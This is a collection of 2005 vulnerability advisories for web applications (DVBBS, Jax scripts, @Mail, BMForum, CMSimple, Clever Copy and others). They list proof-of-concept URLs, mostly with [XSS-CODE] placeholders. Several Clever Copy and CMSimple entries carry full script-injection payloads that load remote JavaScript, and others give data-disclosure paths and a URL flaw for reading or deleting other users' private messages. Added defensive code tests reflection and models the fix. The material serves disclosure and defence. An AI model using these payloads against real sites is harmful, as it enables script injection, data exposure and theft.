http://[victim]/forums/showthread.php?threadid=195805&postid=3579278[XSS-CODE]#post_3579278

http://[victim]/forums/showthread.php?threadid=195605&curr=0[XSS-CODE]

########################### €nd ############################

Thanks to estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Spymac Web os 4.0 variable XSS

Sunday, September 11, 2005
#######################################################
Spymac Web os 4.0 variable XSS
Vendor URL: http://www.spymac.com/
Advisory: http://lostmon.blogspot.com/2005/09/spymac-web-os-40-variable-xss.html
Vendor notified: yes   Exploit available: yes
OSVDB ID: 19438
SecurityTracker: 1014883
########################################################

Spymac is powered by an integrated collection of applications
(developed in-house) that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.

Spymac has a flaw that allows a remote cross-site scripting attack.
The flaw exists because the application does not validate the
'category' variable when it is submitted to the index.php script.
An attacker can therefore craft a URL that executes arbitrary
script in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity.

############
Version affected
############

Spymac Web Os 4.0

#########
Solution
#########

No solution at this time

##########
timeline
##########

Discovered : 10 sep 2005
Vendor notify: 10 sep 2005
Vendor response: 10 sep 2005
Disclosure : 10 sep 2005
Public disclosure: 11 sep 2005

############
Examples
############

http://[victim]/index.php?category=1%22%3E%3Cbody%3E%3Ch1%3ESe%20busca
%20H4x0r%3C/h1%3E%3Cp%3E%20es%20peligroso%20y%20va%20armado%3Cbr%3E%20
Lleva%20un%20portatil%20y%20un%20palm%20en%20las%20manos%3Cbr%3E%20si%
20le%20ven%20;%20no%20le%20proporcionen%20conexion%20a%20internet.%3C/p
%3E%3Cp%3E%3C/p%3E%3Cimg%20src=http://www.ttvn.com.vn/Uploaded/administrator/
hacker.jpg%3E%3Ch1%3EBy%20Lostmon%3C/h1%3E%3C/body%3E

(The injected HTML is a Spanish "Wanted: H4x0r" notice, "he is dangerous
and armed, carries a laptop and a palm in his hands; if you see him, do
not give him an internet connection", followed by an external image and
a "By Lostmon" heading. The leading %22%3E, a double quote and a closing
angle bracket, breaks out of the markup the category value is echoed into.)

############################# €nd ##########################

Thanks to estrella for being my light...
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

DVBBS Multiple variable Cross site scripting

Monday, August 08, 2005
#############################################
DVBBS Multiple variable Cross site scripting
Vendor URL: http://down.dvbbs.net/SoftView/SoftView_2455.html
Advisory: http://lostmon.blogspot.com/2005/08/dvbbs-multiple-variable-cross-site.html
Vendor notified: yes   Exploit available: yes
OSVDB ID: 18512, 18679, 18680
SecurityTracker: 1014632
BID: 14498
Secunia: SA16131
#############################################

DVBBS contains a flaw that allows a remote cross-site scripting
attack. The flaw exists because the application does not validate
multiple variables when they are submitted to multiple scripts. An
attacker can therefore craft a URL that executes arbitrary script
in a user's browser within the trust relationship between the
browser and the server, leading to a loss of integrity.


############
solution
############

no solution available at this time !


############
versions
############

Dvbbs 7.1 Sp2
Dvbbs 7.1

#############
timeline
#############

discovered:21-jul-2005
disclosure:21-jul-2005
public disclosure:08-aug-2005

####################
proof of concept
####################


http://[VICTIM]/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE]

http://[VICTIM]/dispuser.asp?name=Walltrapass[XSS-CODE]

http://[VICTIM]/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title=
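The "[XSS-CODE]" slots in the proof-of-concept URLs of this post, and of the Spymac, Flyspray, Comersus, CubeCart and Jax posts on this page, all mark the same test: put a value in the slot and see whether it comes back in the page unencoded. Below is an added example, not code from any of the advisories, of how a practitioner fills such a slot with a canary (a unique tag, the four characters an injection needs, and a trailer) and reads back which of those characters the response left raw. It runs offline on constructed response bodies; the host name and the markup in them are assumptions.

```python
# Added example; not code from any advisory on this page. Fills the [XSS-CODE]
# slot of a PoC URL with a canary and reports which metacharacters a response
# reflected unencoded. Response bodies here are constructed for the demo.
import html
import re
from urllib.parse import quote

PLACEHOLDER = "[XSS-CODE]"
META = '"\'<>'                  # attribute break-out and tag injection characters
ENTITY = re.compile(r"&(?:#x[0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);")


def canary(tag: str) -> str:
    """Marker, the metacharacters, then a trailer that proves the value
    came back whole rather than truncated."""
    return f"xss{tag}" + META + f"{tag}end"


def expand(template: str, tag: str) -> str:
    """Replace the advisory's [XSS-CODE] slot with the URL-encoded canary."""
    return template.replace(PLACEHOLDER, quote(canary(tag), safe=""))


def surviving_metachars(body: str, tag: str) -> set:
    """Which of META came back raw? An entity that decodes to the character
    counts as neutralised; a missing character counts as stripped; an
    occurrence without its trailer is ignored as truncated or rewritten."""
    hits = set()
    for m in re.finditer(re.escape(f"xss{tag}"), body):
        pos, found = m.end(), set()
        for ch in META:
            if body.startswith(ch, pos):
                found.add(ch)
                pos += 1
                continue
            ent = ENTITY.match(body, pos)
            if ent and html.unescape(ent.group(0)) == ch:
                pos = ent.end()
            # otherwise the character was stripped: keep pos, try the next one
        if body.startswith(f"{tag}end", pos):
            hits |= found
    return hits


def exploitable_in_attribute(body: str, tag: str) -> bool:
    """Reflected inside a double-quoted attribute, '">' alone breaks out."""
    return {'"', ">"} <= surviving_metachars(body, tag)


if __name__ == "__main__":
    url = expand("http://victim.example/dispuser.asp?name=Walltrapass[XSS-CODE]", "A1")
    print(url)
    # Constructed response: the name was echoed raw into an attribute value.
    body = '<input type="text" name="name" value="WalltrapassxssA1"\'<>A1end">'
    print(sorted(surviving_metachars(body, "A1")), exploitable_in_attribute(body, "A1"))
```

In use, fetch the URL that expand() returns and hand the response body to surviving_metachars(). The canary is deliberately inert (no tag, no script), so it is safe to send against a production site, and reading which characters survived tells you which context is reachable: a raw '"' and '>' is enough to break out of a quoted attribute, while '<' and '>' alone suffice when the value lands in text between tags.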

######################## €nd ##########################

Thanks to estrella for being my light

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Jax PHP Scripts multiple vulnerabilities

Friday, August 05, 2005
############################################
Jax PHP Scripts multiple vulnerabilities
Vendor URL: http://www.jtr.de/scripting/php/
Advisory: http://lostmon.blogspot.com/2005/08/jax-php-scripts-multiple.html
Vendor notified: yes   Exploit available: yes
OSVDB ID: 18568, 18569, 18570, 18571, 18572, 18573, 18574, 18575, 18576,
18577, 18578, 18579, 18580, 18581, 18582, 18583, 18584, 18585, 18586
Secunia: SA16332, SA16333, SA16337, SA16338
BID: 14481
#############################################


###########
Summary:
###########

0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline

###############
0- Description
###############

Jax scripts is a collection of useful PHP scripts to add to or include in a web site.

Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook

Jax Petitionbook (GPL)* ==> adaptation of Jax Guestbook for running a WWW Petitionbook

Jax Newsletter (GPL)* ==> php script for running online Mailing lists / Newsletters
(Mailing List Manager)

Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists
(Hyperlink Manager)

Jax Calendar (GPL)* ==> php script for running a simple Web Calendar
(calendar manager)

Jax DWT Editor (GPL)* ==> php script for editing html files based on Dreamweaver templates
(Template Editor)



###################
1-Products affected
###################

Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.

##################
2- Jax Guestbook
##################

Cross-Site Scripting and information disclosure:

http://[victim]/guestbook/jax_guestbook.php?page=2&language=
english&guestbook_id=0&gmt_ofs=0[XSS-CODE]


http://[victim]/jax_guestbook.php?page=2&language=english
[XSS-CODE]&guestbook_id=0&gmt_ofs=0

http://[victim]/guestbook/jax_guestbook.php?page=2
[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0

http://[victim]/guestbook/jax_guestbook.php?mailto=
9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]


http://[victim]/guestbook/guestbook
// IP addresses of the clients who have signed the guestbook

http://[victim]/guestbook/guestbook_ips2block
// list of banned IPs

http://[victim]/guestbook/ips2block
// list of banned IPs

http://[victim]/guestbook/formmailer/logfile.csv
// IPs of, and messages from, users who sent mail through the formmail.php script

These are flat-file data stores kept under the web root, so anyone
can fetch them with a direct request until they are moved outside
the document root or denied in the web-server configuration.

################
versions
###############

Jax Guestbook v3.1
Jax Guestbook v3.31

###################
3- Jax Petitionbook
###################

Cross-Site Scripting and information disclosure:

http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]

http://[victim]/petitionbook/shrimp_petition.php?page=3
&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0

http://[victim]/petitionbook/shrimp_petition.php?page=3
[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0


http://[victim]/petitionbook/formmailer.log
// every IP and message that users have sent via formmail

http://[victim]/petitionbook/ips2block
// all banned IPs

http://[victim]/petitionbook/petitionbook
// IPs of everyone who has signed the petition



#################
4- Jax Newsletter
#################

Cross-Site Scripting and information disclosure:

http://[victim]/newsletter/jax_newsletter.php?language=
German[XSS-CODE]&ml_id=1

http://[victim]/newsletter/sign_in.php?do=sign_in
&language=german[XSS-CODE]&ml_id=1&ml_id=1

http://[victim]/newsletter/archive.php?
language=spanish[XSS-CODE]

http://[victim]/newsletter/logs/jnl_records
// information disclosure of user data; a direct request
to this file reveals:

"email","hash","mail_format","gender","nick","mode",
"groups","action","time","ip","age","profession",
"nationality" from registered users.

############
versions
############

Jax Newsletter v2.14
Jax Newsletter v2.10

#################
5- Jax LinkLists
#################

Cross-Site Scripting and information disclosure:

http://[victim]/linklists/jax_linklists.php?
language=English[XSS-CODE]

http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]

http://[victim]/linklists/suggestions.csv
// a direct request discloses the IP of the client who
suggested a link.

#############
versions
#############

Jax LinkLists v1.1
Jax LinkLists v1.0


#################
6- Jax Calendar
#################

Cross-Site Scripting:

http://[victim]/calendar/jax_calendar.php?Y=2005
[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0
9437c00badaf419eb0db5&cal_id=0&language=spanish&
gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-
%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-
+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld


http://[victim]/calendar/jax_calendar.php?Y=2005&m=8
[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba
daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=
d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18
%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im
+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e
b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld


http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld


http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls
ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe
ld[XSS-CODE]



http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&
cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]

// all variables affected by XSS flaws

http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]

// all variables affected by XSS flaws

http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30

// all variables affected by XSS flaws



##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33


#################
7- Jax DWT Editor
#################

Cross-Site Scripting:

http://[victim]/dwt_editor/dwt_editor.php?language=english
[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor


http://[victim]/dwt_editor/dwt_editor.php?language=english
&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor


http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=
%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=
german&area=textbereich2[XSS-CODE]


##############
versions
##############

Jax DWT Editor v1.0


###################
8- Timeline
###################

discovered:27-07-2005
Vendor notify:04-08-2005
vendor response:04-08-2005
disclosure:05-08-2005

#################### End #############################

Thnx to estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....

@Mail multiple variable cross-site scripting

Thursday, July 28, 2005
#############################################
@Mail multiple variable cross-site scripting
vendor url:http://www.atmail.com
Advisory:http://lostmon.blogspot.com/2005/07/
mail-multiple-variable-cross-site.html
vendor notify:yes exploit available: yes
OSVDB ID:18337,18338,18339,18340
Secunia: SA16252
BID: 14408
##############################################


@Mail is a feature-rich email solution that allows users to access
email resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s).


@Mail contains a flaw that allows a remote cross site scripting
attack. This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts. This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

#############
versions
#############

@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /

It is also possible that other versions are vulnerable.

#################
solution
#################

Apply patch for version 4.11.
http://calacode.com/patch.pl

#################
Timeline
#################

Discovered:02-07-2005
vendor notify:27-07-2005
vendor response:28-07-2005
disclosure:28-07-2005


##################
Proof of concepts
##################

Exploiting these flaws requires a client login, and exploiting
the flaws in /webadmin/ requires an admin login.

###################
printcal.pl
###################

http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4

http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]

http://[victim]/printcal.pl?type=4[XSS-CODE]

###################
task.pl
###################

http://[victim]/task.pl?func=todo[XSS-CODE]

###################
compose.pl
####################

http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.
[victim].com%3A2%2C&folder=Sent&cache=&func=reply
&type=reply[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r

http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=&Bcc=[XSS-CODE]


http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=[XSS-CODE]&Bcc=

http://[victim]/compose.pl?func=new&To=
lala@lala.es[XSS-CODE]&Cc=&Bcc=

###################
webadmin/filter.pl
###################

http://[victim]/webadmin/filter.pl?func=
viewmailrelay&Order=IPaddress[XSS-CODE]

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from&Type=1[XSS-CODE]&View=1

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from[XSS-CODE]&Type=1&View=1

http://[victim]/webadmin/filter.pl?
func=filter&Header=whitelist_from&Type=0&Display=1
&Sort=value[XSS-CODE]&Type=1&View=1



######################## End ##########################

Thnx to estrella for being my light

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....

Clever Copy Unauthorized read & delete Private Messages

Wednesday, July 27, 2005
################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-unauthorized-read-delete.html
vendor notify: yes exploit available:yes
OSVDB ID: 18509
Secunia : SA16236
BID:14397
################################################


Clever Copy is a free, fully scalable web site portal and news posting
system. You can run it as a very simple blog or ramp it up to a full
Content Management System.

Clever Copy contains a flaw that allows unauthorized reading and deletion of other users' private messages.

The flaw is triggered when an authenticated user directly requests a
specially crafted URL to gain unauthorized access to private messages.

############
versions
############

Clever Copy 2.0
Clever Copy 2.0a

###############
Solution
###############

No solution at this time !!

###################
Timeline
###################

Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005

###################
proof of concept
###################

First we must be logged in to have access to private messages,
then go to this URL:

http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=read&ID=2&user=waltrapass

and we see message 2 of the user waltrapass :)

op= read or del
ID= id of the message we want to view
name= username of the user who sent the private message
( this is not necessary to view or delete a message)
user= username of the user whose PMs we are trying to view

To delete a message we can go to a similar URL:

http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=del&ID=2&user=waltrapass
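
As an added model of the flaw and of its fix (constructed Python, not Clever Copy's code): a vulnerable handler that, like readpm.php here, takes the mailbox owner from the 'user' query parameter, beside a fixed handler that decides ownership from the logged-in session and checks it before any read or delete. The message store, usernames and session identities are constructed.

```python
"""Constructed model of the readpm.php authorization flaw and a fix.

Not Clever Copy's code: an in-memory private-message table and two handlers
for the parameters the advisory names (op, ID, user). The vulnerable handler
lets the 'user' query parameter choose whose mailbox is read or deleted; the
fixed handler takes the identity from the login session and checks ownership
before doing anything. Usernames and message data are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class PrivateMessage:
    msg_id: int
    recipient: str  # mailbox owner
    sender: str
    body: str


@dataclass
class MessageStore:
    messages: Dict[int, PrivateMessage] = field(default_factory=dict)

    def get(self, msg_id: int) -> Optional[PrivateMessage]:
        return self.messages.get(msg_id)

    def delete(self, msg_id: int) -> None:
        self.messages.pop(msg_id, None)


class Forbidden(Exception):
    """Request refused: not logged in, or the message belongs to someone else."""


def readpm_vulnerable(store: MessageStore, session_user: Optional[str],
                      params: Dict[str, str]) -> Optional[PrivateMessage]:
    """Mirrors the flawed behaviour: any logged-in user may name another
    user's mailbox in 'user' and read or delete that user's message."""
    if session_user is None:
        raise Forbidden("login required")
    owner = params.get("user")  # taken from the URL, not from the session
    msg = store.get(int(params["ID"]))
    if msg is None or msg.recipient != owner:
        return None
    if params.get("op") == "del":
        store.delete(msg.msg_id)
    return msg


def readpm_fixed(store: MessageStore, session_user: Optional[str],
                 params: Dict[str, str]) -> PrivateMessage:
    """Hardened handler: ownership is decided by the session identity; the
    'user' and 'name' parameters are ignored for authorization."""
    if session_user is None:
        raise Forbidden("login required")
    op = params.get("op")
    if op not in ("read", "del"):
        raise ValueError("unknown op")
    try:
        msg_id = int(params["ID"])
    except (KeyError, ValueError):
        raise ValueError("bad ID")
    msg = store.get(msg_id)
    # One answer for "no such message" and "not your message", so the ID
    # space cannot be probed for other users' mail.
    if msg is None or msg.recipient != session_user:
        raise Forbidden("no such message in your mailbox")
    if op == "del":
        store.delete(msg_id)
    return msg


def access_allowed(store: MessageStore, session_user: Optional[str],
                   params: Dict[str, str]) -> bool:
    """True when the fixed handler would serve the request."""
    try:
        readpm_fixed(store, session_user, params)
        return True
    except (Forbidden, ValueError):
        return False


def sample_store() -> MessageStore:
    """Constructed data using the usernames from the advisory's URLs."""
    store = MessageStore()
    store.messages[2] = PrivateMessage(2, recipient="waltrapass",
                                       sender="pruebas", body="hello")
    return store


if __name__ == "__main__":
    # The advisory's URL as parsed parameters:
    # readpm.php?op=read&ID=2&name=pruebas&user=waltrapass
    url = {"op": "read", "ID": "2", "name": "pruebas", "user": "waltrapass"}
    store = sample_store()
    print("vulnerable, other user:", readpm_vulnerable(store, "someone_else", url))
    print("fixed, other user allowed:", access_allowed(store, "someone_else", url))
    print("fixed, owner allowed:", access_allowed(store, "waltrapass", url))
```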

##################### End #############################

thnxs to estrella for being my light
thnxs to http://www.osvdb.org/

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....

Multiple Cross site scripting in BMForum

################################################
Multiple Cross site scripting in BMForum
vendor url:http://www.bmforum.com/
Advisory:http://lostmon.blogspot.com/2005/07/
multiple-cross-site-scripting-in.html
Vendor notify:yes Exploit available:yes
OSVDB ID:18306,18307,18308,18309,18310,18311,18312,18313,18314
Secunia: SA16224
BID: 14396
################################################


BMForum contains a flaw that allows a remote cross site scripting
attack. This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts. This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.



####################
VERSIONS
####################

BMForum Datium! 3.0 RC4
BMForum Datium! 3.0 RC3
BMForum Datium! 3.0 RC2
BMForum Datium! 3.0 RC1
BMForum Plus! 3.0 RC4
BMForum Plus! 3.0 RC3
BMForum Plus! 3.0 RC2
BMForum Plus! 3.0 RC1
BMForum Plus!MX 3.0.0.5
BMForum Plus! 2.6.1


###################
Solution:
###################

No solution at this time.

###################
Timeline:
###################

Discovered: 21-07-2005
vendor notify:25-07-2005
Disclosure:27-07-2005

###################
Proof of XSS
####################

####################
topic.php
####################

http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496&page=2[XSS-CODE]
http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496[XSS-CODE]&page=2
http://[VICTIM]/topic.php?filename=1923[XSS-CODE]

#################
forums.php
#################

http://[VICTIM]/bmb/forums.php?forumid=6[XSS-CODE]
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime[XSS-CODE]&jinhua=&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=[XSS-CODE]&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=&page=[XSS-CODE]


###################
post.php
###################

http://[VICTIM]/post.php?forumid=2\[XSS-CODE]

###################
announcesys.php
###################

http://[VICTIM]/announcesys.php?forumid=0[XSS-CODE]

#################
Others
#################

http://[VICTIM]/datafile/regipbans.php // banned IPs.
http://[VICTIM]/bmb/datafile/sendmail.php // full path disclosure.
http://[VICTIM]/post_global.php //full path disclosure
http://[VICTIM]/bmb/datafile/bbslog2.txt //data disclosure
http://[VICTIM]/bmb/bbslog.txt // data disclosure

################### End ######################

thnx to estrella for being my light.

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....

CMSimple 'search' variable XSS

Thursday, July 21, 2005
##############################################
CMSimple 'search' variable XSS
Vendor url:http://www.cmsimple.dk/
Advisory:http://lostmon.blogspot.com/2005/07/
cmsimple-search-variable-xss.html
vendor fix:http://www.cmsimple.dk/
forum/viewtopic.php?t=2470
Vendor confirmed:YES exploit available:yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
Securitytracker: 1014556
##############################################



CMSimple is a simple content management system for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!


CMSimple contains a flaw that allows a remote cross site scripting
attack. This flaw exists because the application does not validate the
'search' variable upon submission to the 'index.php' script. This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

The index.php file contains only an include of the cmsimple/cms.php file.


#############
VERSIONS
#############

CMSimple 2.4 and earlier versions


#############
Solution
#############

vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470

Fix:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;

should be replaced with:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));

Will be fixed in next beta.

#############
Timeline
#############

discovered: 13-07-2005
vendor notify:20-07-2005
vendor response:21-07-2005
vendor fix:21-07-2005
disclosure:21-07-2005


################
Proof of concept
################

http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>



http://[victim]/?function=search&search=[XSS-CODE]

http://[victim]/?&print&function=search&search=[XSS-CODE]

http://[victim]/?License&function=search&search=[XSS-CODE]

http://[victim]/?Resellers&function=search&search=[XSS-CODE]

http://[victim]/?&guestbook&function=search&search=[XSS-CODE]


###################### End #########################

Thnx to estrella for being my light
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....

Clever copy Path disclosure and XSS

Monday, July 18, 2005
################################################
Clever copy Path disclosure and XSS
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-path-disclosure-and-xss.html
vendor notify: yes exploit available:yes
OSVDB ID: 18349,18350,18351,18352,18353,18354,18355,
18356,18357,18358,18359,18360,18361
Secunia: SA16236
BID:14395
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system. You can run it as a very simple blog or ramp it up to a full
Content Management System.

Clever Copy contains a flaw that allows a remote cross site scripting
attack. This flaw exists because the application does not validate the
'searchtype' and 'searchterm' variables upon submission to the
'results.php' and 'categorysearch.php' scripts. This could allow a user
to create a specially crafted URL that would execute arbitrary code in
a user's browser within the trust relationship between the browser and
the server, leading to a loss of integrity.

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 15-07-2005
Vendor notify: 18-07-2005
Vendor response: 18-07-2005
Disclosure: 19-07-2005

##############
EXPLOITS
##############

http://[VICTIM]/results.php?searchtype="><script src="
http://www.drorshalev.com/dev/injection/js.js"></script>
category&searchterm=Announcements

http://[VICTIM]/results.php?searchtype=category&searchterm=">
<scriptsrc="http://www.drorshalev.com/dev/injection/js.js&
quot;></script>Announcements


http://[VICTIM]/results.php?start=0&searchtype="><script
src="http://www.drorshalev.com/dev/injection/js.js"><
/script>category&searchterm=Announcements

http://[VICTIM]/results.php?start=0&searchtypecategory&searchterm=
Announcements="><script src="http://www.drorshalev
.com/dev/injection/js.js"></script>

http://[VICTIM]/categorysearch.php?star=0&searchtype="><
script src="http://www.drorshalev.com/dev/injection/js.js
"></script>category&searchterm=Announcements

http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&
searchterm=Announcements"><script src="http://
www.drorshalev.com/dev/injection/js.js"></script>

################################
direct request path disclosure:
################################

http://[VICTIM]/ticker.php
http://[VICTIM]/menu.php
http://[VICTIM]/banned.php
http://[VICTIM]/endlayout.php
http://[VICTIM]/randomhlinesblock.php
http://[VICTIM]/showlast.php
http://[VICTIM]/showlast5class1.php
http://[VICTIM]/showlast5phorum.php
http://[VICTIM]/showlast5phorumblock.php
http://[VICTIM]/showlastforumbb2.php
http://[VICTIM]/showlastforumbb2block.php


